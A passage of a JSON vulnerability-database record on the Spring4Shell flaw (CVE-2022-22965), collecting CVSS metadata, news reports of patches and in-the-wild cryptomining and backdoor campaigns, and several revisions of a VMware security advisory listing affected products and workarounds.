"cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:6DA934C9E783C787D408548AA6F1CEC3", "href": "https://msrc.microsoft.com/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2022-04-08T19:36:04", "description": "UPDATE, APRIL 4, 2022: The Kenna Risk Score for CVE-2022-22965 is currently at maximum 100. This is an exceptionally rare score, of which only 415 out of 184,000 CVEs (or 0.22 percent) have achieved, reflecting the severity and potential effects of this vulnerability. To get a risk score this high... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T10:26:10", "type": "talosblog", "title": "Threat Advisory: Spring4Shell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T10:26:10", "id": "TALOSBLOG:3587BB077717B0512A9D0EFCCBE8770B", "href": "http://blog.talosintelligence.com/2022/03/threat-advisory-spring4shell.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhWlwJSeK-UN5NDOjiAywASbd_85nVwwTSZ4p8416Nk2RzVheiZQZRoJ5feUk8aU4hPOqPbLeoQN6jMQxYXE9wZB1Tz_HjYFDEo_gzhIQz0vrVA0tBuh4Plkfo8LRfEkUpX-to0flLTfnMNB0JmxRQsmswCA5bl1WedSRcYO93Vy5C1Y9lZXBeiRxfE/s728-e100/patch.jpg>)\n\nThe maintainers of Spring Framework have released an emergency patch to address a newly disclosed [remote code execution flaw](<https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html>) that, if successfully exploited, could allow an unauthenticated attacker to take control of a targeted system.\n\nTracked as [CVE-2022-22965](<https://tanzu.vmware.com/security/cve-2022-22965>), the high-severity flaw impacts Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and other older, unsupported versions. Users are recommended to upgrade to versions 5.3.18 or later and 5.2.20 or later.\n\nThe Spring Framework is a Java framework that offers infrastructure support to develop web applications.\n\n\"The vulnerability impacts Spring [MVC](<https://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93controller>) [model\u2013view\u2013controller] and Spring WebFlux applications running on [Java Development Kit] 9+,\" Rossen Stoyanchev of Spring.io [said](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) in an advisory published Thursday.\n\n\"The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e., the default, it is not vulnerable to the exploit,\" Stoyanchev added.\n\n\"Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,\" Praetorian researchers Anthony Weems and Dallas Kaman [said](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>).\n\nThat said, Spring.io warned that the \"nature of the vulnerability is more general\" and that there could be other ways to weaponize the flaw that has not come to light.\n\nThe patch arrives as a Chinese-speaking researcher briefly published a GitHub commit that contained proof-of-concept (PoC) exploit code for CVE-2022-22965 on March 30, 2022, before it was taken down.\n\nSpring.io, a subsidiary of VMware, noted that it was first alerted to the vulnerability \"late on Tuesday evening, close to midnight, GMT time by codeplutos, meizjm3i of AntGroup FG Security Lab.\" It also credited cybersecurity firm Praetorian for reporting the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:35:00", "type": "thn", "title": "Security Patch Releases for Critical Zero-Day Bug in Java Spring Framework", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T03:15:06", "id": "THN:7A3DFDA680FEA7FB77640D29F9D3E3E2", "href": "https://thehackernews.com/2022/03/security-patch-releases-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiQLJsA4VqLU_2Ko5mgCsWlJMIvwJT2aoEwLoOKMLxy58CeNKOGs27Dp9UfziDFWzjBdovG_PWvQNtsSMBZo4TPOTCJEfeBa3iT0K6lhdquC_6NlvR1qkZoGlYQfXgCwTDOk-gGVKSHY_iHWYSwCWPKdbGNIFo7sFQcS8GrfaN9XAP9-OcC3-Q64mup/s728-e100/crypto-mining.jpg>)\n\nLemonDuck, a cross-platform cryptocurrency mining botnet, is targeting Docker to mine cryptocurrency on Linux systems as part of an active malware campaign.\n\n\"It runs an anonymous mining operation by the use of proxy pools, which hide the wallet addresses,\" CrowdStrike [said](<https://www.crowdstrike.com/blog/lemonduck-botnet-targets-docker-for-cryptomining-operations/>) in a new report. \"It evades detection by targeting Alibaba Cloud's monitoring service and disabling it.\"\n\nKnown to strike both Windows and Linux environments, LemonDuck is primarily engineered for abusing the system resources to mine Monero. But it's also capable of credential theft, lateral movement, and facilitating the deployment of additional payloads for follow-on activities.\n\n\"It uses a wide range of spreading mechanisms \u2014 phishing emails, exploits, USB devices, brute force, among others \u2014 and it has shown that it can quickly take advantage of news, events, or the release of new exploits to run effective campaigns,\" Microsoft [detailed](<https://thehackernews.com/2021/07/microsoft-warns-of-lemonduck-malware.html>) in a technical write-up of the malware last July. \n\nIn early 2021, attack chains involving LemonDuck [leveraged](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) the then newly patched [Exchange Server vulnerabilities](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) to gain access to outdated Windows machines, before downloading backdoors and information stealers, including Ramnit.\n\nThe latest campaign spotted by CrowdStrike takes advantage of exposed Docker APIs as an initial access vector, using it to run a rogue container to retrieve a Bash shell script file that's disguised as a harmless PNG image file from a remote server.\n\nAn analysis of historical data shows that similar image file droppers hosted on LemonDuck-associated domains have been put to use by the threat actor since at least January 2021, the cybersecurity firm noted.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgnepqytFGyLXQ-se6LSQbD8dcaKtmXDuAVuPCd_sPXu7Yx48Lz-oOWavHaLTuVfJs51onI2dx2vm_sbhMbEMBmlmxd2VKQlwVynElKDwR3CU4NPjtYhIE7eAKStI5X-t0n_wmahvr1LKomSVvdEsfaiHUYHz1dDW2dYzUEwbyQLlaW27yosLkpLVHy/s728-e100/docker.jpg>)\n\nThe dropper files are key to launching the attack, with the shell script downloading the actual payload that then kills competing processes, disables Alibaba Cloud's monitoring services, and finally downloads and runs the XMRig coin miner.\n\nWith [compromised cloud instances](<https://thehackernews.com/2021/11/hackers-using-compromised-google-cloud.html>) becoming a hotbed for illicit cryptocurrency mining activities, the findings underscore the need to secure containers from potential risks throughout the software supply chain.\n\n### TeamTNT targets AWS, Alibaba Cloud\n\nThe disclosure comes as Cisco Talos exposed the toolset of a cybercrime group named TeamTNT, which has a history of targeting cloud infrastructure for cryptojacking and placing backdoors.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj6dfAwirfE8zK8lIvO9C83J02rpPa4oqENbHyfJRLj36q8mg1qdWQazJucqou991fXw6Xt6GyN-cLDDFrr2CAxKN7qIC4HXZI2r7XKpG_vwbA5MggiCzUCWAs0-mSkJ6kbK3Dz00BVEgGS5JmJphX1B9Igew8fq9dCPv_WDqWCupPxoaYwe4nSYro3/s728-e100/code.jpg>)\n\nThe malware payloads, which are said to have been modified in response to [previous public disclosures](<https://www.trendmicro.com/en_us/research/21/c/teamtnt-continues-attack-on-the-cloud--targets-aws-credentials.html>), are primarily designed to target Amazon Web Services (AWS) while simultaneously focused on cryptocurrency mining, persistence, lateral movement, and disabling cloud security solutions.\n\n\"Cybercriminals who are outed by security researchers must update their tools in order to continue to operate successfully,\" Talos researcher Darin Smith [said](<https://blog.talosintelligence.com/2022/04/teamtnt-targeting-aws-alibaba.html>).\n\n\"The tools used by TeamTNT demonstrate that cybercriminals are increasingly comfortable attacking modern environments such as Docker, Kubernetes, and public cloud providers, which have traditionally been avoided by other cybercriminals who have instead focused on on-premise or mobile environments.\"\n\n### Spring4Shell exploited for cryptocurrency mining\n\nThat's not all. In yet another instance of how threat actors quickly co-opt newly disclosed flaws into their attacks, the critical remote code execution bug in Spring Framework ([CVE-2022-22965](<https://thehackernews.com/2022/04/hackers-exploiting-spring4shell.html>)) has been weaponized to deploy cryptocurrency miners.\n\nThe exploitation attempts make use of a custom web shell to deploy the cryptocurrency miners, but not before turning off the firewall and terminating other virtual currency miner processes.\n\n\"These cryptocurrency miners have the potential to affect a large number of users, especially since Spring is the most widely used framework for developing enterprise-level applications in Java,\" Trend Micro researchers Nitesh Surana and Ashish Verma [said](<https://www.trendmicro.com/en_us/research/22/d/spring4shell-exploited-to-deploy-cryptocurrency-miners.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T09:30:00", "type": "thn", "title": "Watch Out! Cryptocurrency Miners Targeting Dockers, AWS and Alibaba Cloud", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-22T09:30:49", "id": "THN:8FDA592D55831C1C4E3583B81FABA962", "href": "https://thehackernews.com/2022/04/watch-out-cryptocurrency-miners.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T15:21:14", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjZikEHbQZH2740G4dp8jO0kyRIM7gekb01xPNfj0-CNWOHWfP49M11r5XMILsEcE7cPt2iS2r5JguGaSn_eB79jXM2K0R34NTk8BJ914Rl12I6nIAEFE-yl5_wTmv9bEkhsALDug2BF38CByGj0bXfCDfOdw9gmkOjWBtZi0TtheQni8IQOx3M9hnZ/s728-e100/hacking.jpg>)\n\nA threat actor is said to have \"highly likely\" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector.\n\nThe attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as **TAC-040**.\n\n\"The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory,\" the company [said](<https://www.deepwatch.com/labs/deepwatch-ati-detects-and-responds-to-never-before-discovered-backdoor-deployed-using-confluence-vulnerability-for-suspected-espionage/>). \"After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.\"\n\nThe Atlassian vulnerability suspected to have been exploited is [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>), an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.\n\nFollowing reports of active exploitation in real-world attacks, the issue was addressed by the Australian company on June 4, 2022.\n\nBut given the absence of forensic artifacts, Deepwatch theorized the breach could have alternatively entailed the exploitation of the Spring4Shell vulnerability ([CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>)) to gain initial access to the Confluence web application.\n\nNot much is known about TAC-040 other than the fact that the adversarial collective's goals could be espionage-related, although the possibility that the group could have acted out of financial gain hasn't been ruled out, citing the presence of a loader for an XMRig crypto miner on the system.\n\nWhile there is no evidence that the miner was executed in this incident, the Monero address owned by the threat actors has netted at least 652 XMR ($106,000) by hijacking the computing resources of other systems to illicitly mine cryptocurrency.\n\nThe attack chain is also notable for the deployment of a previously undocumented implant called Ljl Backdoor on the compromised server. Roughly 700MB of archived data is estimated to have been exfiltrated before the server was taken offline by the victim, according to an analysis of the network logs.\n\nThe malware, for its part, is a fully-featured trojan virus designed to gather files and user accounts, load arbitrary .NET payloads, and amass system information as well as the victim's geographic location. \n\n\"The victim denied the threat actor the ability to laterally move within the environment by taking the server offline, potentially preventing the exfiltration of additional sensitive data and restricting the threat actor(s) ability to conduct further malicious activities,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T10:24:00", "type": "thn", "title": "Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26134"], "modified": "2022-08-05T14:21:49", "id": "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "href": "https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "vmware": [{"lastseen": "2022-04-14T16:19:16", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-02T00:00:00", "id": "VMSA-2022-0010", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T12:09:47", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T00:00:00", "id": "VMSA-2022-0010.4", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.4.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T08:32:24", "description": "**IMPORTANT See the Notes section if prior to April 6, 3 PM PST you have updated TAS or Ops Manager or you have applied workarounds to TAS, Ops Manager or TKGi.**\n\n##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs (TAS) \n\n * VMware Tanzu Operations Manager (Ops Manager) \n\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * **2022-04-04:** At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * **2022-04-06:** VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild. \n**2022-04-06:** Customers that have applied the workaround for TAS, Ops Manager, or TKGI prior to April 6, 3 PM PST will need to reapply the workaround. The new workaround instructions now use UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to TAS 2.10.29, 2.11.17, 2.12.10 or 2.13.1 will need to update to the TAS versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-06:** Customers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 are advised to deploy the workaround as no version for Ops Manager is yet available that addresses CVE-2022-22965.\n * **2022-04-07:** \nCustomers that have updated to Ops Manager 2.8.20, 2.9.35 or 2.10.35 will need to update to the Ops Manager versions listed in this advisory. The patched versions now listed in this advisory ship with UAA 74.5.37 which properly addresses CVE-2022-22965.\n * **2022-04-08:** Investigations have concluded, and the list of affected VMware products contained in the 'Response Matrix' below is complete.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T00:00:00", "id": "VMSA-2022-0010.3", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.3.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-06T21:13:59", "description": "##### **1\\. Impacted Products**\n\n * VMware Tanzu Application Service for VMs \n\n * VMware Tanzu Operations Manager\n * VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)\n\n##### **2\\. Introduction**\n\nA critical vulnerability in Spring Framework project identified by CVE-2022-22965 has been publicly disclosed which impacts VMware products. \n\n\n##### **3\\. Problem Description**\n\n**Description**\n\nMultiple products impacted by remote code execution vulnerability (CVE-2022-22965).\n\n**Known Attack Vectors**\n\nA malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system.\n\n**Resolution**\n\nFixes for CVE-2022-22965 are documented in the 'Fixed Version' column of the 'Response Matrix' below.\n\n**Workarounds**\n\nWorkarounds for CVE-2022-22965 are documented in the 'Workarounds' column of the 'Response Matrix' below.\n\n**Additional Documentation**\n\nNone.\n\n**Notes**\n\n * At the time of this publication, VMware has reviewed its product portfolio and found that the products listed in this advisory are affected. VMware continues to investigate this vulnerability, and will update the advisory should any changes evolve.\n * VMware is aware of reports that exploitation of CVE-2022-22965 has occurred in the wild.\n\n**Acknowledgements**\n\nNone.\n\n", "cvss3": {}, "published": "2022-04-02T00:00:00", "type": "vmware", "title": "VMware Response to Spring Framework Remote Code Execution Vulnerability (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-06T00:00:00", "id": "VMSA-2022-0010.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0010.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 